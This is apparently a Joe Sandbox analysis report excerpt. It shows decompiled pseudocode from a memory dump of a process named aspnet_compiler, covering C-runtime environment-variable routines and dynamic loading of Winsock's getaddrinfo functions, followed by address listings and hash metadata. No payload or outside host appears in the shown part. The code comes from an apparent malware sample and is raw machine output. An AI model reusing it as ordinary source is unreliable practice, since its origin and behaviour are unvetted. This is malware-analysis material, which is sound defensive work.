																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E0044E355(_t302);
																					E00445002(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E00445002( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E0044E355(_t302);
																				E00445002(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x4704e4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E004443F4(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E00445002(_t304);
																					goto L56;
																				} else {
																					_t148 = E004463E1(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043A5E8();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E004443F4(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E004449F5(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E00445002(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E004443F4(_t262, _t95, 1);
																										E00445002(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E0044030E( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043A5E8();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E004443F4(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E004449F5(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E00445002(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E004443F4(_t267 - _t284 >> 1, _t107, 2);
																																E00445002(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E004463E1( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043A5E8();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x4704e0; // 0xec46b8
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004481E9(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0043EEAD();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x4704e0; // 0xec46b8
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x4704e4 = E004443F4(_t246, 1, 4);
																				E00445002(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x4704e0 = E004443F4(_t246, 1, 4);
																				E00445002(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x4704e0 - _t221; // 0xec46b8
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x4704e4; // 0xecda90
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L004424A7(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x4704e4; // 0xecda90
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E00445002(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0043EEAD();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0043EEAD();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x4704e0 = E004443F4(_t231, 1, 4);
										E00445002(_t218);
										_t298 =  *0x4704e0; // 0xec46b8
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x4704e4 - _t218; // 0xecda90
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x4704e4 = E004443F4(_t231, 1, 4);
												E00445002(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x4704e4 - _t218; // 0xecda90
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x4704e4 - _t218; // 0xecda90
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L004424A2(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x4704e0; // 0xec46b8
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E00445002(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0043EEAD();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}








































































































                    0x0044dcb6
                    0x0044dcbb
                    0x0044dcd2
                    0x0044dcd4
                    0x0044dcd9
                    0x0044dcdd
                    0x0044dcde
                    0x0044dce0
                    0x0044dd30
                    0x0044dd35
                    0x00000000
                    0x0044dce2
                    0x0044dce2
                    0x0044dce4
                    0x00000000
                    0x0044dce6
                    0x0044dce6
                    0x0044dcea
                    0x0044dcf0
                    0x0044dcf3
                    0x0044dcf6
                    0x0044dcfc
                    0x0044dcff
                    0x0044dd04
                    0x0044dd06
                    0x0044dd09
                    0x0044dd0a
                    0x0044dd0a
                    0x0044dd10
                    0x0044dd12
                    0x0044dd14
                    0x0044dda8
                    0x0044ddab
                    0x0044ddad
                    0x0044ddaf
                    0x0044ddb0
                    0x0044ddb1
                    0x0044ddb6
                    0x0044ddbb
                    0x0044ddbd
                    0x0044de07
                    0x0044de07
                    0x0044de0a
                    0x00000000
                    0x0044de10
                    0x0044de10
                    0x0044de12
                    0x0044de15
                    0x0044de15
                    0x0044de18
                    0x0044de1a
                    0x00000000
                    0x0044de20
                    0x0044de20
                    0x0044de26
                    0x00000000
                    0x0044de2c
                    0x0044de2c
                    0x0044de2e
                    0x0044de36
                    0x0044de38
                    0x0044de3d
                    0x0044de40
                    0x0044de42
                    0x00000000
                    0x0044de48
                    0x0044de48
                    0x0044de4b
                    0x0044de4d
                    0x0044de50
                    0x0044de53
                    0x00000000
                    0x0044de53
                    0x0044de42
                    0x0044de26
                    0x0044de1a
                    0x0044ddbf
                    0x0044ddbf
                    0x0044ddc1
                    0x00000000
                    0x0044ddc3
                    0x0044ddc6
                    0x0044ddcc
                    0x0044ddcf
                    0x0044ddd2
                    0x0044dde6
                    0x0044dde6
                    0x0044dde9
                    0x00000000
                    0x00000000
                    0x0044dde2
                    0x0044dde5
                    0x0044dde5
                    0x0044dde5
                    0x0044ddeb
                    0x0044dded
                    0x0044ddf5
                    0x0044ddf7
                    0x0044ddfc
                    0x0044ddff
                    0x0044de01
                    0x0044de03
                    0x0044de57
                    0x0044de57
                    0x0044de57
                    0x0044ddd4
                    0x0044ddd4
                    0x0044ddd7
                    0x0044ddd9
                    0x0044ddd9
                    0x0044de5d
                    0x0044de60
                    0x00000000
                    0x0044de66
                    0x0044de66
                    0x0044de68
                    0x0044de6b
                    0x0044de6b
                    0x0044de6d
                    0x0044de6e
                    0x0044de6e
                    0x0044de7a
                    0x0044de82
                    0x0044de85
                    0x0044de86
                    0x0044de88
                    0x0044ded1
                    0x0044ded2
                    0x00000000
                    0x0044de8a
                    0x0044de91
                    0x0044de96
                    0x0044de99
                    0x0044de9b
                    0x0044dedd
                    0x0044dede
                    0x0044dedf
                    0x0044dee0
                    0x0044dee1
                    0x0044dee2
                    0x0044dee7
                    0x0044deeb
                    0x0044deed
                    0x0044def0
                    0x0044def1
                    0x0044def4
                    0x0044def6
                    0x0044df08
                    0x0044df09
                    0x0044df0a
                    0x0044df0d
                    0x0044df0f
                    0x0044df14
                    0x0044df18
                    0x0044df19
                    0x0044df1b
                    0x0044df6c
                    0x0044df71
                    0x00000000
                    0x0044df1d
                    0x0044df1d
                    0x0044df1f
                    0x00000000
                    0x0044df21
                    0x0044df21
                    0x0044df27
                    0x0044df29
                    0x0044df2d
                    0x0044df30
                    0x0044df33
                    0x0044df39
                    0x0044df3b
                    0x0044df3c
                    0x0044df42
                    0x0044df45
                    0x0044df47
                    0x0044df47
                    0x0044df4d
                    0x0044df4f
                    0x0044dfdc
                    0x0044dfe7
                    0x0044dfea
                    0x0044dfef
                    0x0044dff4
                    0x0044dff6
                    0x0044e040
                    0x0044e040
                    0x0044e043
                    0x00000000
                    0x0044e049
                    0x0044e049
                    0x0044e04b
                    0x0044e04e
                    0x0044e04e
                    0x0044e051
                    0x0044e053
                    0x00000000
                    0x0044e059
                    0x0044e059
                    0x0044e05f
                    0x00000000
                    0x0044e065
                    0x0044e065
                    0x0044e067
                    0x0044e06f
                    0x0044e071
                    0x0044e076
                    0x0044e079
                    0x0044e07b
                    0x00000000
                    0x0044e081
                    0x0044e081
                    0x0044e084
                    0x0044e086
                    0x0044e089
                    0x0044e08c
                    0x00000000
                    0x0044e08c
                    0x0044e07b
                    0x0044e05f
                    0x0044e053
                    0x0044dff8
                    0x0044dff8
                    0x0044dffa
                    0x00000000
                    0x0044dffc
                    0x0044dfff
                    0x0044e005
                    0x0044e008
                    0x0044e00b
                    0x0044e01f
                    0x0044e01f
                    0x0044e022
                    0x00000000
                    0x00000000
                    0x0044e01b
                    0x0044e01e
                    0x0044e01e
                    0x0044e01e
                    0x0044e024
                    0x0044e026
                    0x0044e02e
                    0x0044e030
                    0x0044e035
                    0x0044e038
                    0x0044e03a
                    0x0044e03c
                    0x0044e090
                    0x0044e090
                    0x0044e090
                    0x0044e00d
                    0x0044e00d
                    0x0044e010
                    0x0044e012
                    0x0044e012
                    0x0044e096
                    0x0044e099
                    0x00000000
                    0x0044e09f
                    0x0044e09f
                    0x0044e0a1
                    0x0044e0a1
                    0x0044e0a4
                    0x0044e0a4
                    0x0044e0a7
                    0x0044e0aa
                    0x0044e0aa
                    0x0044e0b5
                    0x0044e0b9
                    0x0044e0c1
                    0x0044e0c4
                    0x0044e0c5
                    0x0044e0c7
                    0x0044e10e
                    0x0044e10f
                    0x00000000
                    0x0044e0c9
                    0x0044e0d1
                    0x0044e0d6
                    0x0044e0d9
                    0x0044e0db
                    0x0044e11a
                    0x0044e11b
                    0x0044e11c
                    0x0044e11d
                    0x0044e11e
                    0x0044e11f
                    0x0044e124
                    0x0044e127
                    0x0044e128
                    0x0044e12b
                    0x0044e12c
                    0x0044e12f
                    0x0044e131
                    0x0044e13a
                    0x0044e13c
                    0x0044e13e
                    0x0044e140
                    0x0044e142
                    0x0044e142
                    0x0044e145
                    0x0044e146
                    0x0044e146
                    0x0044e142
                    0x0044e14c
                    0x0044e157
                    0x0044e15a
                    0x0044e15b
                    0x0044e15d
                    0x0044e1c4
                    0x0044e1c4
                    0x00000000
                    0x0044e15f
                    0x0044e15f
                    0x0044e162
                    0x0044e1b4
                    0x0044e1b6
                    0x0044e1bc
                    0x00000000
                    0x0044e164
                    0x0044e164
                    0x0044e167
                    0x0044e167
                    0x0044e169
                    0x0044e169
                    0x0044e16b
                    0x0044e16b
                    0x0044e16e
                    0x0044e16e
                    0x0044e170
                    0x0044e171
                    0x0044e171
                    0x0044e175
                    0x0044e179
                    0x0044e17d
                    0x0044e187
                    0x0044e18a
                    0x0044e18f
                    0x0044e192
                    0x0044e196
                    0x00000000
                    0x0044e198
                    0x0044e1a0
                    0x0044e1a5
                    0x0044e1a8
                    0x0044e1aa
                    0x0044e1c9
                    0x0044e1cb
                    0x0044e1cc
                    0x0044e1cd
                    0x0044e1ce
                    0x0044e1cf
                    0x0044e1d0
                    0x0044e1d5
                    0x0044e1d8
                    0x0044e1d9
                    0x0044e1db
                    0x0044e1dc
                    0x0044e1dd
                    0x0044e1de
                    0x0044e1e1
                    0x0044e1e3
                    0x0044e1ec
                    0x0044e1ed
                    0x0044e1ef
                    0x0044e1f1
                    0x0044e1f3
                    0x0044e1f6
                    0x0044e1f7
                    0x0044e1f9
                    0x0044e1fb
                    0x0044e1fb
                    0x0044e1fe
                    0x0044e1ff
                    0x0044e1ff
                    0x0044e1fb
                    0x0044e203
                    0x0044e20e
                    0x0044e212
                    0x0044e214
                    0x0044e282
                    0x0044e282
                    0x00000000
                    0x0044e216
                    0x0044e216
                    0x0044e218
                    0x0044e272
                    0x0044e273
                    0x0044e279
                    0x00000000
                    0x0044e21a
                    0x0044e21c
                    0x0044e21c
                    0x0044e21e
                    0x0044e21e
                    0x0044e220
                    0x0044e220
                    0x0044e223
                    0x0044e223
                    0x0044e226
                    0x0044e229
                    0x0044e229
                    0x0044e235
                    0x0044e239
                    0x0044e241
                    0x0044e247
                    0x0044e24c
                    0x0044e24f
                    0x0044e253
                    0x00000000
                    0x0044e255
                    0x0044e25d
                    0x0044e262
                    0x0044e265
                    0x0044e267
                    0x0044e287
                    0x0044e289
                    0x0044e28a
                    0x0044e28b
                    0x0044e28c
                    0x0044e28d
                    0x0044e28e
                    0x0044e293
                    0x0044e296
                    0x0044e299
                    0x0044e29a
                    0x0044e29b
                    0x0044e29c
                    0x0044e2a2
                    0x0044e2a4
                    0x0044e2a7
                    0x0044e2d3
                    0x0044e2d3
                    0x0044e2d3
                    0x0044e2d8
                    0x0044e2a9
                    0x0044e2a9
                    0x0044e2ac
                    0x0044e2b2
                    0x0044e2b7
                    0x0044e2ba
                    0x0044e2bc
                    0x00000000
                    0x0044e2be
                    0x0044e2c0
                    0x0044e2c3
                    0x0044e2c5
                    0x0044e2e1
                    0x0044e2e3
                    0x0044e2c7
                    0x0044e2c7
                    0x0044e2c9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e2c9
                    0x0044e2c5
                    0x00000000
                    0x0044e2cb
                    0x0044e2cb
                    0x0044e2ce
                    0x0044e2ce
                    0x00000000
                    0x0044e2ac
                    0x0044e2da
                    0x0044e2e0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e267
                    0x00000000
                    0x0044e269
                    0x0044e269
                    0x0044e26c
                    0x0044e26c
                    0x0044e270
                    0x0044e270
                    0x00000000
                    0x0044e270
                    0x0044e218
                    0x0044e1e5
                    0x0044e1e5
                    0x0044e27d
                    0x0044e281
                    0x0044e281
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e1aa
                    0x00000000
                    0x0044e1ac
                    0x0044e1ac
                    0x0044e1af
                    0x0044e1af
                    0x00000000
                    0x0044e1b3
                    0x0044e162
                    0x0044e133
                    0x0044e133
                    0x0044e1bf
                    0x0044e1c3
                    0x0044e1c3
                    0x0044e0dd
                    0x0044e0e1
                    0x0044e0e4
                    0x0044e0ee
                    0x0044e0f6
                    0x0044e0fc
                    0x0044e0fe
                    0x0044e100
                    0x0044e105
                    0x0044e105
                    0x0044e108
                    0x0044e108
                    0x00000000
                    0x0044e0fe
                    0x0044e0db
                    0x0044e0c7
                    0x0044e099
                    0x0044dffa
                    0x0044df55
                    0x0044df55
                    0x0044df5a
                    0x0044df5d
                    0x0044df8a
                    0x0044df8a
                    0x0044df8c
                    0x00000000
                    0x0044df8e
                    0x0044df8e
                    0x0044df90
                    0x0044dfbb
                    0x0044dfc5
                    0x0044dfca
                    0x0044dfcf
                    0x00000000
                    0x0044df92
                    0x0044df9c
                    0x0044dfa1
                    0x0044dfa6
                    0x0044dfa9
                    0x0044dfaf
                    0x00000000
                    0x0044dfb1
                    0x0044dfb1
                    0x0044dfb7
                    0x0044dfb9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044dfb9
                    0x0044dfaf
                    0x0044df90
                    0x0044df5f
                    0x0044df5f
                    0x0044df61
                    0x00000000
                    0x0044df63
                    0x0044df63
                    0x0044df68
                    0x0044df6a
                    0x0044dfd2
                    0x0044dfd2
                    0x0044dfd8
                    0x0044dfda
                    0x0044df77
                    0x0044df77
                    0x0044df77
                    0x0044df7a
                    0x0044df7b
                    0x0044df82
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044df6a
                    0x0044df61
                    0x0044df5d
                    0x0044df4f
                    0x0044df1f
                    0x0044def8
                    0x0044def8
                    0x0044defd
                    0x0044df03
                    0x0044df85
                    0x0044df89
                    0x0044df89
                    0x0044de9d
                    0x0044dea6
                    0x0044deae
                    0x0044deb2
                    0x0044deb9
                    0x0044debf
                    0x0044dec1
                    0x0044dec3
                    0x0044dec8
                    0x0044dec8
                    0x0044decb
                    0x0044decb
                    0x00000000
                    0x0044dec1
                    0x0044de9b
                    0x0044de88
                    0x0044de60
                    0x0044ddc1
                    0x0044dd1a
                    0x0044dd1a
                    0x0044dd1d
                    0x0044dd4e
                    0x0044dd4e
                    0x0044dd50
                    0x0044dd60
                    0x0044dd65
                    0x0044dd6a
                    0x0044dd70
                    0x0044dd73
                    0x0044dd75
                    0x00000000
                    0x0044dd77
                    0x0044dd77
                    0x0044dd7d
                    0x00000000
                    0x0044dd7f
                    0x0044dd89
                    0x0044dd8e
                    0x0044dd93
                    0x0044dd96
                    0x0044dd9c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044dd9c
                    0x0044dd7d
                    0x0044dd52
                    0x0044dd52
                    0x00000000
                    0x0044dd52
                    0x0044dd1f
                    0x0044dd1f
                    0x0044dd25
                    0x00000000
                    0x0044dd27
                    0x0044dd27
                    0x0044dd2c
                    0x0044dd2e
                    0x0044dd9e
                    0x0044dd9e
                    0x0044dda4
                    0x0044dda4
                    0x0044dda6
                    0x0044dd3b
                    0x0044dd3b
                    0x0044dd3b
                    0x0044dd3e
                    0x0044dd3f
                    0x0044dd46
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044dd2e
                    0x0044dd25
                    0x0044dd1d
                    0x0044dd14
                    0x0044dce4
                    0x0044dcbd
                    0x0044dcbd
                    0x0044dcc2
                    0x0044dcc8
                    0x0044dd49
                    0x0044dd4d
                    0x0044dd4d
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable$_wcschr
                    • String ID:
                    • API String ID: 3899193279-0
                    • Opcode ID: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                    • Instruction ID: 70a147eeefff8d80a420db1d2de74d9c70af01ffcddfc6d33a5ace776a2fbf8c
                    • Opcode Fuzzy Hash: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                    • Instruction Fuzzy Hash: B0D137B1D01701ABFB30AF76D882A6E7BA4AF05718F04456FF94597382EB3D9840879C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004140CD Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004140CD() {
				char _v264;
				char _v532;
				intOrPtr _v536;
				CHAR* _v540;
				intOrPtr _v544;
				CHAR* _v548;
				intOrPtr _v552;
				_Unknown_base(*)()* _t42;
				signed int _t52;
				struct HINSTANCE__* _t54;
				struct HINSTANCE__* _t57;
				intOrPtr* _t63;
				void* _t64;

				 *_t63 = "getaddrinfo";
				_v552 = E00413C51;
				_v548 = "getnameinfo";
				_v544 = E00413EF7;
				_v540 = "freeaddrinfo";
				_v536 = E00413C16;
				if( *0x474a88 == 0) {
					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
						E0044030E( &_v532, 0x10c,  &_v264);
						E00440368( &_v532, 0x10c, "\\ws2_32");
						_t64 = _t63 + 0x18;
						_t57 = LoadLibraryA( &_v532);
						_t54 = 0;
						if(_t57 == 0) {
							L6:
							E0044030E( &_v532, 0x10c,  &_v264);
							E00440368( &_v532, 0x10c, "\\wship6");
							_t64 = _t64 + 0x18;
							_t57 = LoadLibraryA( &_v532);
							if(_t57 != 0) {
								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
									FreeLibrary(_t57);
									_t57 = _t54;
								}
								if(_t57 != 0) {
									goto L10;
								}
							}
						} else {
							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
								FreeLibrary(_t57);
								_t57 = 0;
							}
							if(_t57 != 0) {
								L10:
								_t52 = _t54;
								while(1) {
									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
									 *(_t64 + 0x14 + _t52 * 8) = _t42;
									if(_t42 == 0) {
										break;
									}
									_t52 = _t52 + 1;
									if(_t52 < 3) {
										continue;
									} else {
									}
									L15:
									if(_t57 != 0) {
										do {
											 *((intOrPtr*)(_t54 + 0x46f9fc)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
											_t54 = _t54 + 8;
										} while (_t54 < 0x18);
									}
									goto L17;
								}
								FreeLibrary(_t57);
								_t57 = _t54;
								goto L15;
							} else {
								goto L6;
							}
						}
						L17:
					}
					 *0x474a88 = 1;
				}
				return  *0x46f9fc;
			}
















                    0x004140da
                    0x004140e1
                    0x004140e9
                    0x004140f1
                    0x004140f9
                    0x00414101
                    0x00414109
                    0x00414124
                    0x00414141
                    0x00414151
                    0x00414156
                    0x0041416a
                    0x00414172
                    0x00414176
                    0x0041418d
                    0x004141a0
                    0x004141b0
                    0x004141b5
                    0x004141c3
                    0x004141c7
                    0x004141d3
                    0x004141d6
                    0x004141d8
                    0x004141d8
                    0x004141dc
                    0x00000000
                    0x00000000
                    0x004141dc
                    0x00414178
                    0x00414182
                    0x00414185
                    0x00414187
                    0x00414187
                    0x0041418b
                    0x004141de
                    0x004141de
                    0x004141e0
                    0x004141e5
                    0x004141eb
                    0x004141f1
                    0x00000000
                    0x00000000
                    0x004141f3
                    0x004141f7
                    0x00000000
                    0x00000000
                    0x004141f9
                    0x00414200
                    0x00414202
                    0x00414204
                    0x00414208
                    0x0041420e
                    0x00414211
                    0x00414204
                    0x00000000
                    0x00414202
                    0x004141fc
                    0x004141fe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041418b
                    0x00414216
                    0x00414219
                    0x0041421a
                    0x0041421a
                    0x0041422f

                    APIs
                    • GetSystemDirectoryA.KERNEL32 ref: 0041411C
                    • LoadLibraryA.KERNEL32(?), ref: 0041415E
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041417E
                    • FreeLibrary.KERNEL32(00000000), ref: 00414185
                    • LoadLibraryA.KERNEL32(?), ref: 004141BD
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004141CF
                    • FreeLibrary.KERNEL32(00000000), ref: 004141D6
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004141E5
                    • FreeLibrary.KERNEL32(00000000), ref: 004141FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
